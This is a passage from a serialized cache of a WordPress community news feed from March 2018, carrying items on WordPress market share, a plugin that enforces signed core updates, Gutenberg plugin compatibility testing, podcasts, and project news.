the top 10 million sites based on traffic according to <a href=\"https://www.alexa.com/\">Alexa</a>. All sub-domains on WordPress.com and WordPress.org count as one site.</p>\n<blockquote class=\"twitter-tweet\">\n<p lang=\"en\" dir=\"ltr\">All the subdomains of <a href=\"https://t.co/37ETZ4JMFf\">https://t.co/37ETZ4JMFf</a> and <a href=\"https://t.co/YtO6Msd90U\">https://t.co/YtO6Msd90U</a> do indeed only count as one site. Sites that are hosted by Automattic under their own domain do count if they have significant traffic on that domain. These are 0.4%, 29.5% are hosted somewhere else.</p>\n<p>&mdash; W3Techs (@W3Techs) <a href=\"https://twitter.com/W3Techs/status/969523570530451456?ref_src=twsrc%5Etfw\">March 2, 2018</a></p></blockquote>\n<p></p>\n<p>The internet is larger than the top 10 million sites. According to <a href=\"http://www.internetlivestats.com/total-number-of-websites/\">Internet live stats</a>, there are close to 2 billion sites on the internet although a majority of them are inactive.</p>\n<p>W3Techs&#8217; numbers show that WordPress&#8217; use is growing on sites that receive a lot of traffic and shows no signs of slowing down as it makes <a href=\"https://wptavern.com/how-important-is-jetpack-on-wordpress-road-to-50-market-share\">its way towards 50%</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 06 Mar 2018 10:22:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:111:\"WPTavern: New Plugin Makes WordPress Core Updates More Secure by Requiring Cryptographic Signature Verification\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=78171\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:122:\"https://wptavern.com/new-plugin-makes-wordpress-core-updates-more-secure-by-requiring-cryptographic-signature-verification\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4278:\"<p>In 2016, WordFence <a href=\"https://www.wordfence.com/blog/2016/11/hacking-27-web-via-wordpress-auto-update/\">published their findings</a> of a vulnerability that could have compromised the servers that are used to send out WordPress updates. It turned out to be a complex, obscure vulnerability that ignited a conversation surrounding the security of api.wordpress.org and what could happen if the servers were compromised.</p>\n<p>One idea that was brought forth is to digitally sign WordPress core, theme, and plugin updates. For at least five years, <a href=\"https://core.trac.wordpress.org/ticket/25052\">a trac ticket</a> has laid semi-dormant with this idea in mind.</p>\n<p>Fifteen months ago, Scott Arciszewski, Chief Development Officer for Paragon Initiative Enterprises, who is most widely known for his <a href=\"https://paragonie.com/blog/2017/02/cryptographically-secure-php-development\">cryptography engineering work</a>, <a href=\"https://web.archive.org/web/20170214062414/https://medium.com/@CiPHPerCoder/stopmullware-on-the-security-of-27-of-the-websites-on-the-internet-298a7e5b6871\">published an article</a> that has since been taken down, expressing his strong desire for Matt Mullenweg to make secure cryptographic signatures a priority. Mullenweg responded to his post with <a href=\"https://medium.com/@photomatt/wordpress-and-update-signing-51501213e1\">one of his own</a> stating that although WordPress update signing is important, it&#8217;s not a high priority.</p>\n<p>&#8220;We will at some point; as said above it’s a good idea — can’t hurt, might help,&#8221; Mullenweg responded when asked if WordPress was ever going to do update signing. &#8220;There are, however, some more important security issues in front of it, that impact millions of sites in the real world, so we are prioritizing those issues above a nice-to-have, defense in-depth effort.&#8221;</p>\n<h2>Eric Mann Launches Secure WordPress Updates Plugin</h2>\n<p>While WordPress does not digitally sign updates, Eric Mann, founder of <a href=\"https://displace.tech/\">Displace Technologies, LLC</a>, has <a href=\"https://ttmm.io/tech/introducing-secure-updates-for-wordpress/\">created and released</a> a new plugin that adds code signing to WordPress core updates. It&#8217;s called DGXPCO or <a href=\"https://wordpress.org/plugins/dgxpco/\">Digital Guarantees for eXplicitly Permitted Core Operations</a>. You&#8217;ll find it on the plugin directory by searching for DGXPCO.</p>\n<p>When installed and activated, the plugin integrates with the core updater and requires that any core update must have a valid signature before it can be installed. The signature provides a secondary source of truth that confirms the integrity of the files. The signatures are created using a Ed25519 public/private keypair and <a href=\"https://github.com/jedisct1/libsodium\">Libsodium</a> to sign the files’ contents.</p>\n<p>Mann keeps the private key offline and has published the public key online. The public key will not change and if a core update is signed by a different key, it is a red flag and the update should be avoided. In addition, commits made to the <a href=\"https://github.com/DisplaceTech/release-hashes\">release hashes repository</a> on GitHub are signed with <a href=\"https://keybase.io/eamann\">Mann&#8217;s PGP key</a> to verify that he is the one who added new code.</p>\n<p>Mann admits that the solution is not fool-proof and is working towards improving it. In future versions, the plugin will only notify the user of a WordPress core update if a digital signature is available. Plugins and themes are on the roadmap as well with the ability to opt-in.</p>\n<p>Although he is the only person allowed to digitally sign packages, the model is not sustainable.</p>\n<p>&#8220;As I prove out the update system, I’ll also begin adding sets of public keys that are scoped to specific sets of packages,&#8221; Mann said. &#8220;This will, for example, allow me to whitelist a small number of trusted developers to also sign core packages. It might also empower plugin developers to sign their own releases (but not anyone else’s).&#8221;</p>\n<p>Mann is seeking feedback and is hoping the project provides evidence that something like it can be added to WordPress core.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 03 Mar 2018 00:56:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"Post Status: Marketing and positioning WordPress products — Draft podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=44157\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"https://poststatus.com/marketing-positioning-wordpress-products-draft-podcast/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2776:\"<p>Welcome to the Post Status <a href=\"https://poststatus.com/category/draft\">Draft podcast</a>, which you can find <a href=\"https://itunes.apple.com/us/podcast/post-status-draft-wordpress/id976403008\">on iTunes</a>, <a href=\"https://play.google.com/music/m/Ih5egfxskgcec4qadr3f4zfpzzm?t=Post_Status__Draft_WordPress_Podcast\">Google Play</a>, <a href=\"http://www.stitcher.com/podcast/krogsgard/post-status-draft-wordpress-podcast\">Stitcher</a>, and <a href=\"http://simplecast.fm/podcasts/1061/rss\">via RSS</a> for your favorite podcatcher. Post Status Draft is hosted by Brian Krogsgard and co-host Brian Richards.</p>\n<p>This week BK and BR discuss a number of different aspects surrounding marketing and selling WordPress products and services. The conversation flows from selling benefits vs features, to social proof, to marketing and conversion funnels, to understanding and reacting to the problem space, to customer support, and many things in between. Whether you’re already selling products or services, about to sell something, or routinely buy things, there’s likely something for you in this episode.</p>\n<p></p>\n<h3>Links</h3>\n<ul>\n<li>Krogs’ <a href=\"https://wordpress.tv/2015/12/13/brian-krogsgard-how-to-build-a-compelling-wordpress-product-or-service\">WCUS funnel talk</a>: and <a href=\"https://cdn.poststatus.com/wp-content/uploads/2015/12/krogsgard-wc-us-2015-presentation.pdf\">slides</a></li>\n<li><a href=\"https://wpsessions.com/sessions/understand-price-anchoring/\">Price Anchoring session</a> on WPS</li>\n<li><a href=\"https://poststatus.com/marketing-wordpress-products/\">Tips for marketing WordPress products</a></li>\n<li><a href=\"https://poststatus.com/resources/marketing-success-wordpress-case-study-siteground/\">SiteGround’s Publish presentation</a></li>\n<li><a href=\"https://www.ted.com/talks/barry_schwartz_on_the_paradox_of_choice\">TED talk on decision fatigue and the paradox of choice</a> (also good “<a href=\"https://www.ted.com/talks/dan_gilbert_researches_happiness\">Why we make bad decisions</a>”)</li>\n<li><a href=\"https://stripe.com/atlas/guides/saas-pricing\">Stripe Atlas guide to SaaS pricing</a></li>\n</ul>\n<h3>Sponsor: SiteGround</h3>\n<p><a href=\"https://www.siteground.com/wordpress-hosting.htm/?utm_source=post_status&utm_medium=banner&utm_campaign=ps_ads\">SiteGround</a> is engineered for speed, built for security, and crafted for WordPress. They offer feature-rich managed WordPress hosting with premium support, and are officially recommended by WordPress.org. Check out <a href=\"https://siteground.com/poststatus/?utm_source=post_status&utm_medium=banner&utm_campaign=ps_ads\">SiteGround&#8217;s website</a> for a special deal for Post Status listeners, and thanks to SiteGround for being a Post Status partner.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 02 Mar 2018 20:24:41 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Katie Richards\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"WPTavern: 4,500 Plugins Need Your Help in Determining Gutenberg Compatibility\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=78194\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"https://wptavern.com/4500-plugins-need-your-help-in-determining-gutenberg-compatibility\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2608:\"<p>One of the keys to a successful roll out of Gutenberg is plugin compatibility. Without it, users will experience unnecessary frustration and hamper enthusiasm of the new editor. In an effort to figure out what plugins are already compatible with Gutenberg, Daniel Bachhuber <a href=\"https://make.wordpress.org/core/2018/03/01/introducing-the-gutenberg-plugin-compatibility-database/\">has created</a> a <a href=\"https://plugincompat.danielbachhuber.com/\">Gutenberg Plugin Compatibility Database</a>.</p>\n<img />Gutenberg Plugin Compatibility Database\n<p>The database contains 5,000 plugins that represent more than 90% of the total active install count. Plugins are compatible with Gutenberg if they meet the following two requirements.</p>\n<ul>\n<li>A WordPress user can perform the same functional task with Gutenberg active. For instance, if the plugin includes an &#8216;Add Media&#8217; button, it&#8217;s considered Gutenberg-compatible when it has a block registered for the Gutenberg inserter.</li>\n<li>There are no (obvious) errors when the WordPress plugin is active alongside Gutenberg.</li>\n</ul>\n<p>In order to participate in the testing process, you&#8217;ll need to <a href=\"https://plugincompat.danielbachhuber.com/#account-details/\">register an account</a> on the site. Once approved, testers will be able to create a fresh sandboxed WordPress install on the site and test randomly selected plugins. After a manual review is complete, plugins will be marked as <code>is_compatible=yes</code> or <code>is_compatible=no</code>.</p>\n<p>Some plugins are already classified with <code>is_compatible=likely_yes</code> or <code>is_compatible=likely_</code>. As reports are completed, two pie charts that display compatibility results at the bottom of the site update automatically.</p>\n<p>Bachhuber estimates that if each plugin takes about a minute to test, they&#8217;ll need roughly 75 person-hours to get through the remaining 4,500 plugins in the database. This project is a great opportunity for individuals and businesses to contribute back to WordPress via the <a href=\"https://ma.tt/2014/09/five-for-the-future/\">Five for The Future initiative</a>.</p>\n<p>Ideal testers are those who can review dozens of plugins, but even reviewing a few will help the project. If you&#8217;re interested in contributing, check out the project&#8217;s <a href=\"https://github.com/danielbachhuber/gutenberg-plugin-compatibility#gutenberg-plugin-compatibility\">GitHub page</a> to learn what&#8217;s involved in the testing process. Alternatively, visitors can watch the following YouTube video.</p>\n<p></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 02 Mar 2018 00:57:46 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"Dev Blog: The Month in WordPress: February 2018\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=5613\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"https://wordpress.org/news/2018/03/the-month-in-wordpress-february-2018/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5935:\"<p>Judging by the flurry of activity across the WordPress project throughout February, it looks like everyone is really getting into the swing of things for 2018. There have been a lot of interesting new developments, so read on to see what the community has been up to for the past month.</p>\n\n<hr class=\"wp-block-separator\" />\n\n<h2>WordPress 4.9.3 &amp; 4.9.4</h2>\n\n<p>Early in the month, <a href=\"https://wordpress.org/news/2018/02/wordpress-4-9-3-maintenance-release/\">version 4.9.3 of WordPress was released</a>, including a number of important bug fixes. Unfortunately it introduced a bug that prevented many sites from automatically updating to future releases. To remedy this issue, <a href=\"https://wordpress.org/news/2018/02/wordpress-4-9-4-maintenance-release/\">version 4.9.4 was released</a> the following day requiring many people to manually update their sites.</p>\n\n<p>While this kind of issue is always regrettable, the good thing is that it was fixed quickly, and that not all sites had updated to 4.9.3 yet, which meant they bypassed the bug in that version.</p>\n\n<p>You can find out more technical information about this issue <a href=\"https://make.wordpress.org/core/2018/02/06/wordpress-4-9-4-release-the-technical-details/\">on the Core development blog</a>.</p>\n\n<h2>The WordCamp Incubator is Back</h2>\n\n<p>In 2016, the Global Community Team ran an experimental program to help spread WordPress to underserved areas by providing more significant organizing support for their first WordCamp event. This program was dubbed the WordCamp Incubator, and it was so successful in the three cities where it ran that <a href=\"https://wordpress.org/news/2018/02/wordcamp-incubator-2-0/\">the program is back for 2018</a>.</p>\n\n<p>Right now, the Community Team is looking for cities to be a part of this year’s incubator by <a href=\"https://wordcampcentral.polldaddy.com/s/wordcamp-incubator-program-2018-city-application\">taking applications</a>. Additionally, each incubator community will need an experienced WordCamp organizer to assist them as a co-lead organizer for their event — if that sounds interesting to you, then you can <a href=\"https://wordcampcentral.polldaddy.com/s/wordcamp-incubator-program-2018-co-lead-application\">fill in the application form for co-leads</a>.</p>\n\n<p>You can find out further information about the WordCamp Incubator <a href=\"https://make.wordpress.org/community/2018/02/19/wordcamp-incubator-program-2018-announcement/\">on the Community Team blog</a>.</p>\n\n<h2>WordPress Meetup Roundtables scheduled for March</h2>\n\n<p>In order to assist local WordPress meetup organizers with running their meetup groups, some members of the Community Team have organized <a href=\"https://make.wordpress.org/community/2018/02/23/wordpress-meetup-roundtables-scheduled-for-march/\">weekly meetup roundtable discussions through the month of March</a>.</p>\n\n<p>These will be run as video chats at 16:00 UTC every Wednesday this month and will be a great place for meetup organizers to come together and help each other out with practical ideas and advice.</p>\n\n<p>If you are not already in the WordPress meetup program and would like to join, you can find out more information in <a href=\"https://make.wordpress.org/community/handbook/meetup-organizer/welcome/\">the WordPress Meetup Organizer Handbook</a>.</p>\n\n<h2>GDPR Compliance in WordPress Core</h2>\n\n<p>The General Data Protection Regulation (GDPR) is an upcoming regulation that will affect all online services across Europe. In order to prepare for this, a working group has been formed to make sure that WordPress is compliant with the GDPR regulations.</p>\n\n<p>Aside from the fact that this will be a requirement for the project going forward, it will also have an important and significant impact on the privacy and security of WordPress as a whole. The working group has posted <a href=\"https://make.wordpress.org/core/2018/02/19/proposed-roadmap-tools-for-gdpr-compliance/\">their proposed roadmap</a> for this project and it looks very promising.</p>\n\n<p>To get involved in building WordPress Core, jump into the #gdpr-compliance channel in the <a href=\"https://make.wordpress.org/chat/\">Making WordPress Slack group</a>, and follow <a href=\"https://make.wordpress.org/core/\">the Core team blog</a>.</p>\n\n<hr class=\"wp-block-separator\" />\n\n<h2>Further Reading:</h2>\n\n<ul>\n    <li>WPShout published <a href=\"https://wpshout.com/complete-guide-wordpress-security/\">a thorough guide to WordPress security</a>.</li>\n    <li>The Community Team has published interesting statistics from the WordCamp program in <a href=\"https://make.wordpress.org/community/2018/02/27/wordcamps-in-2016/\">2016</a> and <a href=\"https://make.wordpress.org/community/2018/02/28/wordcamps-in-2017/\">2017</a>.</li>\n    <li><a href=\"https://make.wordpress.org/community/2018/02/15/potential-addition-of-a-new-onboarding-team/\">An intriguing proposal has been made</a> for a new ‘Onboarding’ team to be started in the WordPress project.</li>\n    <li>The new editing experience for WordPress, named Gutenberg, continues to be actively developed with <a href=\"https://make.wordpress.org/core/2018/02/16/whats-new-in-gutenberg-16th-february/\">a feature-packed release</a> this past month.</li>\n    <li>The Advanced WordPress Facebook group <a href=\"https://www.youtube.com/watch?v=4vS_jR5-nIo\">held an interview with WordPress co-founder, Matt Mullenweg</a> about the Gutenberg project.</li>\n    <li><a href=\"https://make.wordpress.org/meta/2018/02/27/two-factor-authentication-on-wp-org/\">Two factor authentication is on its way to the WordPress.org network</a> — this will be a great improvement to the overall security of the project.</li>\n</ul>\n\n<p><em>If you have a story we should consider including in the next “Month in WordPress” post, please <a href=\"https://make.wordpress.org/community/month-in-wordpress-submissions/\">submit it here</a>.</em></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 01 Mar 2018 08:41:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Hugh Lashbrooke\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"WPTavern: WPWeekly Episode 306 – AMP, GDPR, and Brewing Beer At The Boss’ House\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"https://wptavern.com?p=78185&preview=true&preview_id=78185\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"https://wptavern.com/wpweekly-episode-306-amp-gdpr-and-brewing-beer-at-the-boss-house\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1707:\"<p>In this episode, <a href=\"http://jjj.me\">John James Jacoby</a> joins me live from Hutchinson, KS, to talk about the news of the week. We started off the show discussing the GDPR and the number of things that need to be considered surrounding the right to be forgotten.</p>\n<p>We also have a lengthy conversation about AMP, the open web, and Automattic&#8217;s relationship with Google. Last but not least, we discussed Automattic&#8217;s recent hiring of Kinsey Wilson to be president of the company.</p>\n<h2>Stories Discussed:</h2>\n<p><a href=\"https://wptavern.com/matt-cromwell-hosts-matt-mullenweg-in-qa-gutenberg-interview\">Matt Cromwell Hosts Matt Mullenweg in Q&amp;A Gutenberg Interview</a><br />\n<a href=\"https://wptavern.com/new-team-forms-to-facilitate-gdpr-compliance-in-wordpress-core\">New Team Forms to Facilitate GDPR Compliance in WordPress Core</a><br />\n<a href=\"https://www.poynter.org/news/one-time-npr-and-nyt-digital-chief-new-adventure-wordpress\">For one-time NPR and NYT digital chief, a new adventure: WordPress</a></p>\n<h2>WPWeekly Meta:</h2>\n<p><strong>Next Episode:</strong> Wednesday, March 7th 3:00 P.M. Eastern</p>\n<p>Subscribe to <a href=\"https://itunes.apple.com/us/podcast/wordpress-weekly/id694849738\">WordPress Weekly via Itunes</a></p>\n<p>Subscribe to <a href=\"https://www.wptavern.com/feed/podcast\">WordPress Weekly via RSS</a></p>\n<p>Subscribe to <a href=\"http://www.stitcher.com/podcast/wordpress-weekly-podcast?refid=stpr\">WordPress Weekly via Stitcher Radio</a></p>\n<p>Subscribe to <a href=\"https://play.google.com/music/listen?u=0#/ps/Ir3keivkvwwh24xy7qiymurwpbe\">WordPress Weekly via Google Play</a></p>\n<p><strong>Listen To Episode #306:</strong><br />\n</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 01 Mar 2018 02:19:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:11:\"\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"HeroPress: Changes Coming To HeroPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://heropress.com/?p=2471\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:115:\"https://heropress.com/changes-coming-heropress/#utm_source=rss&utm_medium=rss&utm_campaign=changes-coming-heropress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4198:\"<p>Over the last few months, I’ve been having some deep talks with my <a href=\"https://twitter.com/mysweetcate\">HeroPress partner</a> about what the future of HeroPress looks like. We came up with some changes that feel deeply satisfying. Changes we think should help HeroPress, help readers, and help us as content producers. So here we go.</p>\n<h3>Financial Changes</h3>\n<p>At various times in the past people have told me that the time I spend on HeroPress is worth compensation. When I first started it as a blog, I had no intention of getting money from it. However, being compensated for my time helped ease the burden on my family.</p>\n<blockquote><p>With that in mind, last fall I test-drove a donation page based on interest from some in the community.</p></blockquote>\n<p>It was a good idea, and I’m thankful for the support I received, but for now it’s not the right path.</p>\n<p>So, I’ve pulled the donation page from the site and am no longer accepting site sponsors. You’ll notice I do have a Sponsorship page, but it lists organizations that have made material contributions like hosting, plugins, etc.</p>\n<h3>Content Changes</h3>\n<p>We’ve been publishing every Wednesday for several years now. Over time, readership has climbed quite a bit. That’s great, but it means that many current readers have never seen the earlier content, which remains quite evergreen.</p>\n<blockquote><p>To address this, we’re going to do new HeroPress essays once a month. The other weeks of the month will be replays of earlier essays.</p></blockquote>\n<p>This allows for some breathing room in gathering new contributors and brings back some really great content that shouldn’t be forgotten.</p>\n<p>It also opens up my time to explore the community more. To see if there are new ways that people, particularly on the fringe, can be helped. Sharing stories is useful, but are there other opportunities and needs we’re missing?</p>\n<h3>The Future</h3>\n<p>So HeroPress will continue. I still love doing it. At various times we’ve discussed making it bigger, doing grand things. But not now. For now we’re going to let it grow organically and continue letting it serve its purpose: to give voice to WordPress stories, to make them known, to inspire.</p>\n<div class=\"rtsocial-container rtsocial-container-align-right rtsocial-horizontal\"><div class=\"rtsocial-twitter-horizontal\"><div class=\"rtsocial-twitter-horizontal-button\"><a title=\"Tweet: Changes Coming To HeroPress\" class=\"rtsocial-twitter-button\" href=\"https://twitter.com/share?text=Changes%20Coming%20To%20HeroPress&via=heropress&url=https%3A%2F%2Fheropress.com%2Fchanges-coming-heropress%2F\" rel=\"nofollow\" target=\"_blank\"></a></div></div><div class=\"rtsocial-fb-horizontal fb-light\"><div class=\"rtsocial-fb-horizontal-button\"><a title=\"Like: Changes Coming To HeroPress\" class=\"rtsocial-fb-button rtsocial-fb-like-light\" href=\"https://www.facebook.com/sharer.php?u=https%3A%2F%2Fheropress.com%2Fchanges-coming-heropress%2F\" rel=\"nofollow\" target=\"_blank\"></a></div></div><div class=\"rtsocial-linkedin-horizontal\"><div class=\"rtsocial-linkedin-horizontal-button\"><a class=\"rtsocial-linkedin-button\" 